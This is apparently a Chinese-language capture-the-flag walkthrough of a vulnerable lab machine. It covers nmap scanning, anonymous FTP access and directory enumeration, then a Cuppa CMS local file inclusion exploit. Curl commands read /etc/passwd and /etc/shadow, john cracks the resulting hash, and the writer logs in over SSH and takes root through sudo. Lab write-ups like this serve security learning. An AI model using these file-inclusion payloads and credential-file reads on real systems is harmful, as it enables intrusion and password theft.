1)信息收集:
1、nmap挖掘信息。2、页面枚举。3、Cuppa CMS LFI
2)提权:
1、sudo提权
1)、将下载好的靶机解压到VMware中打开。
2)、打开kali,查看本机ip地址,同时查看同网段的地址输入:
ifconfig #查看到ip地址为192.168.188.128
nmap -sP 192.168.188.1/24 #查看同网段存活的主机
发现靶机192.168.188.131
3)对靶机进行信息收集,输入:
nmap -p- 192.168.188.131 #收集靶机开放的端口
nmap 192.168.188.131 -sS -sV -A -T5 #收集靶机具体的端口以及底层的信息
发现有21、22、80、3306端口,所以可以想到21端口是否存在未授权登录,像渗透项目四一样,可以匿名登录。22端口可能存在ssh爆破。80端口的web服务可能出现一些web漏洞可以利用等等。
用nmap挖掘到了更多的信息,这里ftp可以进行未授权访问,输入:
ftp 192.168.188.131 #进行anonymous访问,用户名是anonymous,密码随便或者直接回车。
dir #发现有三个文件夹
利用get 依次将其下载到kali本地
下载到本地后依次打开,发现并没有什么有用的东西。
4)对22端口爆破,没有详细的信息没办法生成特别管用的密码文件,也没有爆破出来。然后去查看80端口的web服务,浏览器输入靶机ip地址,发现是个apache的主页。再没什么信息发现。
dirb http://192.168.188.131/
发现了这样的路径,输入该路径发现这是一个Cuppa CMS框架
也可以输入 来查看是什么框架
whatweb http://192.168.188.131/administrator/installation/
6)搜索Cuppa CMS 的exploit,发现了id号为 25971
这是一个文件包含漏洞。可以在kali本地输入:
searchsploit 25971 #查找漏洞
然后就之前的统一操作,locate然后cp到/home/kali,然后打开文件查看该exploit怎么使用
发现没有什么东西输出,url里是get请求,猜测应该是需要post请求。
在终端输入curl --help查看,curl是一个发送请求的命令
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.188.131/administrator/alerts/alertConfigField.php
发现了一个用户,然后输入:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.188.131/administrator/alerts/alertConfigField.php
将这一长串,复制到一个txt文档中,利用john去破解
破解出来用户是w1r3s,密码是computer
7)利用ssh去远程登录下靶机,输入:
8)利用sudo提权,知道了密码,直接sudo提权,然后进入根目录,就发现了flag文件。
后续会具体的学习文件包含漏洞!继续加油~继续努力~